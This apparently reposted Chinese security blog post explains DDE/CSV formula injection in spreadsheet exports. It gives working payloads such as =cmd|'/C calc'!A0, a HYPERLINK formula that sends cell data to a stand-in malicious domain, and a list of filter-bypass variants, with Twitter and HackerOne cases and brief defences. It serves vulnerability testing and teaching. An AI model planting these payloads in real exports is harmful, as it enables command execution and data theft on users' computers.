pb 如何导出csv_DDE注入(CSV)漏洞原理及实战案例全汇总

最新推荐文章于 2021-01-02 00:08:29 发布
最新推荐文章于 2021-01-02 00:08:29 发布
阅读量817 收藏 6
点赞数
文章标签: pb 如何导出csv 澳洲幸运5漏洞公式

在渗透中遇到导出功能时,会如何进行测试?任意文件下载?或者越权查看?很多人很容易忽略的是DDE注入:导出格式为csv,xls时,或许你可以尝试构造这个漏洞,它不会对网站本身产生危害,但会对终端用户造成任意OS命令执行等危害。

234facdc6bfc8f4349288172150ef3c7.png

1、漏洞原理:

1)Excel解析机制

第一个需要知道的知识点是,在Excel任何以'='字符开头的单元格都将被电子表格软件解释为公式,如果我们在其中输入“=2+5”,则表格会显示为:

daf724ea74c56c3a8890479b36aafe19.png

  实际上,除了=号,以下符号都可用于在Microsoft Excel中触发公式解释:

  • 等于(“=”)

  • 加(“+”)

  • 减号(“ - ”)

  • 在 (”@”)

这个可以帮助我们在等号=被过滤时,使用其他运算符绕过。

2)DDE注入

动态数据交换(DDE),全称DynamicData Exchange,是Windows下进程间通信协议,支持Microsoft Excel,LibreOffice和Apache OpenOffice。Excel、Word、Rtf、Outlook都可以使用这种机制,根据外部应用的处理结果来更新内容。因此,如果我们制作包含DDE公式的CSV文件,那么在打开该文件时,Excel就会尝试执行外部应用。比如我们构造包含如下字符串的csv或xls文件:

=cmd | '/ C calc' !A0

Excel会尝试调用本机CMD命令,给出友好提示,若用户在无意识状态下点击“是”:

a9573a4688dcd47dfd7f4ecfd74e65be.png

而后尝试接受更正拼写错误,不接受更正则会执行cmd命令,弹出计算器:

a7f32ad1e17c9cefe10b94e5cd8084e3.png

所以攻击的路线就很清晰了:

业务系统接受用户输入并导出为csv——>恶意用户通过界面输入payload——>受害者下载文件并在PC运行——>受害者PC被攻击。因此DDE注入攻击是一种攻击源来自网站,但最终目标是普通用户PC的一种攻击。

2、漏洞危害:

1)OS命令执行

  OS任意命令执行是最主要的危害,像上面讲过的,可以使用= cmd | '/ C calc' !A0弹计算器或者使用=cmd|'/k ipconfig'!A0弹出ipconfig命令的方式探测漏洞是否存在。类比XSS的利用思路,如果系统可以实现alert(1)弹框效果,说明我们可以执行任意的js代码,这取决于我们的利用思路。比如:

  • 添加用户;

  • 开启任意应用程序:IE;

  • 操作注册表;

  • 反弹shell;

2)信息泄露

  超链接功能 Hyperlink创建快捷方式并进行跳转,单击包含HYPERLINK函数的单元格时,Microsoft Excel将打开存储在link_location的文件,如:

6df3f8374af538ebb8ac302b68378c2b.png

  可将表格其中一个单元格设置为以下形式:

=HYPERLINK(“https://maliciousDomain.com/evil.html?data=”&A1,“Click to view additional information”)”

将创建一个单元格,显示文本“单击以查看其他信息”,当用户单击,将发送A1中的数据到maliciousDomain.com,从而导致信息泄露。当然使用第一种攻击方式也可以实现这种攻击效果,如:

=6-5 cmd|’ /C “C:\Program Files\InternetExplorer\iexplore.exe” http:///asd.html’!A0

它将用户定向到恶意钓鱼网站,实现窃取哈希值和口令等操作。

3、实战案例

1)Twitter导出数据处DDE

 Twitter用户发帖,输入:

50d80e69fcac48ee32da3d57c994faac.png

 界面导出数据处,导出csv文件并在Excel中查看:

ebeb2ade20321a53874680b411608220.png

 若输入payload:=cmd|' /Ccalc'!A0再次执行,弹出计算器:

2c6f0315c9dfae8fd67861fd467dd4a0.png

2)Hackerone报告导出

 这是对于Hackerone过滤的一个绕过,网站后台对于等号=之前新增单引号‘以防止公式执行。但在报告导出功能处参数title输入:

%0A-2+3+cmd|' /C calc'!D2:

d58e73d6b5a4a1e5496cbdbc211a61fd.png  %0A被解析为换行符,使得payload正常执行:

972f1b75d109ad4fc31de5482f7ff269.png

3)Hackerone过滤绕过

这是对后台过滤的第二次绕过,在等号前加一个分号;可绕过:

;=cmd|' /C calc'!A0

fe9838c90c5a1d61aa1024ebe14c701c.png

Excel识别并解析分隔符;,将数据拆分并执行:

422982179e43e3d90894bb3c578dbf0f.png

4、挖掘思路:

此漏洞特征较明显,因此思路简单:

1、关注系统中是否有导出为csv或xls表格的功能,一般存在于信息统计,日志导出等功能处;

2、确定导出的内容是否用户可控:

1)可能在界面可直接进行编辑/新增;

2)通过数据篡改/HPP/追踪数据源等方式看是否可以控制输入;

3、输入处写入测试脚本=2*10,导出后查看表格内容是否解析,输入:

966f90537bc4d4138a01df617b3c76a1.png

导出后查看,成功解析:

5a792cfc5da9f69214e2d4dedea8b643.png

4、存在过滤,尝试绕过,最后进行OS执行等深入利用。

5、绕过技巧:

根据案例和挖掘经验,总结常用的绕过payload有:

1、-3+2+cmd |’ /C calc’ !A0

  在等于号被过滤时,可以通过运算符+-的方式绕过;

2、%0A-3+3+cmd|' /C calc'!D2

参数处输入此payload,%0A被解析,从而后面的数据跳转到下一行;

3、;-3+3+cmd|' /C calc'!D2

导出文件为csv时,若系统在等号=前加了引号’过滤,则可以使用分号绕过,分号;可分离前后两部分内容使其分别执行,本机测试:

ab5fd5125c2fefe584d72a7394ccc2e8.png

4、@SUM(cmd|'/c calc'!A0)

5、=HYPERLINK("https://evil.com")

6、防御手段

1)一般的防御手段为,在生成电子表格时,以任何危险符号开头的字段应该以单引号、撇号(')字符或空格作为前缀,确保单元格不被解释为公式,但存在可能被绕过的风险。

2)更好的防御手段为,根据业务需求控制用户输入为字母数字字符;或黑名单过滤=或-号开头的单元格数据,过滤=(-)cmd或=(-)HYPERLINK或concat等。

weixin_39932838
关注
CSV文件注入漏洞简析
不忘初心,护天下安全!
08-21 513
攻击者通过在CSV文件中构造恶意的命令或函数,使得正常用户在使用Excel打开这个CSV文件后恶意的命令或函数被执行,从而造成攻击行为。通过在CSV文件注入超链接函数,当用户打开文件并点击链接时,可以把指定的单元格内容提交到指定网址(如下提交A2/A3单元格的内容)。比如攻击者可以在登录输入框、以及其他的查询、写入功能中注入恶意命令,当管理员使用CSV格式导出网站日志时,就可能发生此类攻击。因此,利用这种漏洞危害,我们可以在用户的操作系统上执行添加用户、开启任意程序、操作注册表、反弹shell等命令。
Web 安CSV 注入攻击详解
最新发布
cc123489ll的博客
06-28 675
CSV 是一种简单的文件格式,用于存储表格数据,每行一个数据记录,每个记录由逗号分隔的多个字段组成。CSV文件因其简单性和跨平台性而被广泛使用,在数据导出和导入中尤其常见。CSV 注入攻击是攻击者通过某些方式在 CSV 文件注入恶意的代码,并利用电子表格软件处理 CSV文件时的特性来执行恶意代码实现非法操作的攻击方式。这种攻击通常发生在应用程序在处理 CSV文件时,没有正确地校验或转义用户输入的特殊字符,从而被攻击者利用在 CSV 文件注入恶意代码。
pb 如何导出csv_【Power BI Desktop】用“R脚本”导出数据
weixin_39547298的博客
10-22 702
Power BI Desktop没有自己的导出数据功能。但是,仍然可以使用“ R脚本”来实现。在此示例中,将展示如何从Web下载数据,对其进行编辑并将其另存为.csv文件。当前这仅在Power BI Desktop中有效,因为Power Query在Excel中没有“ R脚本”。一、下载财务数据首先,去cash.ch并寻找一些股票。选择web作为数据源,然后输入网址https://www.cash...
pb 如何导出csv_如何导出SQL Server 数据到CSV文件呢?
weixin_39533659的博客
11-20 302
数据库在通信行业里,平时都会接触到很多报表,不管是从网管的数据,还是从专业的优化平台,要处理各类的报表数据,所有做个定时报表输出,直接从数据库生成,能减轻不少重复的工作量,也减轻工作压力,那有什么好的方法,网上各种的导成EXCEL方法,都太复杂了,MSSQL可以直接生成TXT,CSV,而且CSV也相当于是EXCEL,对于一个数据经常导来导去的家伙来说,CSV是再好不过了,这个问题,其实是个老生常谈...
pb 如何导出csv_Go Dumpling!让导出数据更容易
weixin_39589511的博客
10-22 332
作者介绍:李淳竹(li chunzhu),TiDB 研发工程师。Tools SIG Community:主要涵盖 TiDB 数据处理工具,包含 TiDB 数据备份/导入导出,TiDB 数据变更捕获,其他数据库数据迁移至 TiDB 等。Dumpling 是由 Go 语言编写的用于对数据库进行数据导出的工具。目前支持 MySQL 协议的数据库,并且针对 TiDB 的特性进行了优化。Dumpling 的...
pb 如何导出csv_《通讯录管理系统》之 5——数据导出
weixin_39608680的博客
10-22 269
各位朋友,你们好。今天继续和你们分享《通讯录管理系统》的数据导出功能。【由于是效果演示,文件中的数据均为随机模拟数据,姓名、电话、地址等无任何关联。】在今天的分享之前,我们回顾下之前分享的《通讯录管理系统》功能说明做一个简单的回顾:《通讯录管理系统》功能介绍【文字版】《通讯录管理系统》功能介绍【视频版】《通讯录管理系统》安选项介绍【文字版】《通讯录关系系统》安选项介绍【视频版】《通讯录管理系统...
pb 如何导出csv_如何计算指数温度?
weixin_39654322的博客
11-20 475
指数温度的高低与价格高低没有必然的联系,指数温度的高低反映的是在历史中低于指数当前估值出现的概率。温度越低说明在历史上低于当前估值的概率越小,指数的价值越被低估,上涨的概率越大;温度越高说明在历史上低于当前估值的概率越大,指数的价值越被高估,下跌的概率越大。01—百度“理杏仁”,打开官网并注册登录。点击“指数”栏目,下拉找到需要的指数的历史数据。02—进入指数页面,分别导出市盈率PE和市...
csv 单引号 数字_DDE注入CSV漏洞原理实战案例汇总
weixin_42522167的博客
01-02 1190
在渗透中遇到导出功能时,会如何进行测试?任意文件下载?或者越权查看?很多人很容易忽略的是DDE注入导出格式为csv,xls时,或许你可以尝试构造这个漏洞,它不会对网站本身产生危害,但会对终端用户造成任意OS命令执行等危害。1、漏洞原理:1)Excel解析机制第一个需要知道的知识点是,在Excel任何以'='字符开头的单元格都将被电子表格软件解释为公式,如果我们在其中输入“=2+5”,则...
dde.rar_DDE_dde matlab_dde23 matl_matlab dde23_延迟
09-14
"dde.rar_DDE_dde matlab_dde23 matl_matlab dde23_延迟"这个压缩包文件很可能包含了一个关于如何使用MATLAB的dde23函数来求解延迟微分方程的详细教程或案例分析。下面将深入探讨DDEdde23函数以及在解决此类问题时...
DDE-Client.rar_DDE_DdeClient_ndde .pfx
09-14
标题中的"DDE-Client.rar_DDE_DdeClient_ndde.pfx"表明这是一个关于DDE(Dynamic Data Exchange)客户端实现的项目,其中包含了相关的代码和证书文件DDE是一种在Windows操作系统中不同应用程序间交换数据的技术,...
pb数据窗口导出工具
05-20
pb6.5 数据窗口导出 pb9.0 数据窗口导出 pb10.5 数据窗口导出 pbd转换成pbl
dde.zip_DDE_dde vb_vb DDE_服务端
09-23
标题中的“dde.zip_DDE_dde vb_vb DDE_服务端”暗示了这个压缩包内容与DDE(Dynamic Data Exchange)技术有关,特别是涉及到VB(Visual Basic)编程语言的应用,以及DDE服务端的实现。DDE是微软在Windows操作系统中...
dde-server.rar_DDE_DDE server_Server_dde server_netdde
09-19
DDE-SERVER,提供TCP/IP (UDP)到DDE SERVER的协议转换,避免netdde的不稳定性,适应用DDE作网络数据交换场合
pb 如何导出csv_# 有意思的数据分析如何在百万级的数据里找到别人正在赚钱的项目...
weixin_39907311的博客
11-12 164
本文的数据分析思路来自该文:如何在百万级的数据里找到别人正在赚钱的项目君言,公众号:亦无所知如何在百万级的数据里找到别人正在赚钱的项目作为一名算法工程师对里面的数据分析思路很感兴趣,趁着周末就实操了一遍期望也能挖掘点赚钱的项目,代码如下:1.导入相关工具包import numpy as npfrom numpy.random import permutationimport pandas...
pb 如何导出csv_通过JQData批量导出指定时间段的估值及财务数据,并保存为csv文件...
weixin_39860946的博客
11-20 162
作为基本面投资者,企业的估值指标(pe、pb、ps)及财务数据非常重要,而如何快速导出特定时间段的这些数据?下面的代码不仅可以快速导出JQ所有的估值指标及最新财务数据(需要哪些指标可以直接在代码中添加),而且还有股票筛选功能,代码简单,功能灵活。from jqdatasdk import * import sqlalchemy import pandas as pd from datetime i...
pb 如何导出csv_[云丰商城]如何导入淘宝数据包(csv
weixin_39605463的博客
10-27 404
一、概述商城支持使用导入淘宝数据包csv的方式,将淘宝的产品导入进来,以下内容将详细介绍如何进行导入。二、获取csv数据包1.下载数据包(一般下载的数据包都是以压缩格式的)具体需要下载淘宝的相关助手软件,通过淘宝助手和甩手工具导出的淘宝csv文件(具体使用方法需要联系对应的客服咨询)2.导出后,会有两个文件,一个是csv电子表格,一个是tbi格式的文件。3.上传的时候分别选择两个文件去上传,然后勾...
pb 如何导出csv_球第一免费开源ERP Odoo开发技巧之导入、导出以及模块数据
weixin_39638309的博客
11-20 287
引言大多数Odoo 模块的定义,如用户界面和安规则,实际是存储在对应数据表中的数据记录。模块中的 XML 和 CSV 文件不是 Odoo 应用运行时使用,而是载入数据表的手段。正是因为这个原因,Odoo 模块的一个重要部分是在文件中放入数据以在插件安装时将其载入数据库。模块可以包含初始数据和演示数据,可通过数据文件将它们加入模块。此外,了解 Odoo 数据的格式对于在项目实施上下文中导入导出业务...
pb 如何导出csv_「号外」智能版成功上位,PB常规版将被取代
weixin_39809793的博客
11-20 61
越是临近旺季,越是要浪~相信接下来一段时间最浪最关键的调整就是,ProductBoost常规版将完被智能版取代!2019年7月31日起,ProductBoost产品引流工具常规版将完被智能版取代,也就是说,从7月31日开始,各位商户通过Wish商户平台、CSV上传、API只可创建ProductBoost智能版活动。7月31日前创建和运行的PB常规版活动,以及在7月31日前创建的循环更新的、且更...
WinCC与VB、Excel的DDE通讯详解及实战步骤
本文档主要介绍了如何在西门子WinCC软件中利用DDE(动态数据交换)技术进行与Excel和VB(Visual Basic)的数据交互。DDE是早期流行的局域网数据交换标准,允许不同应用程序之间共享和交换数据。以下是详细的步骤和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值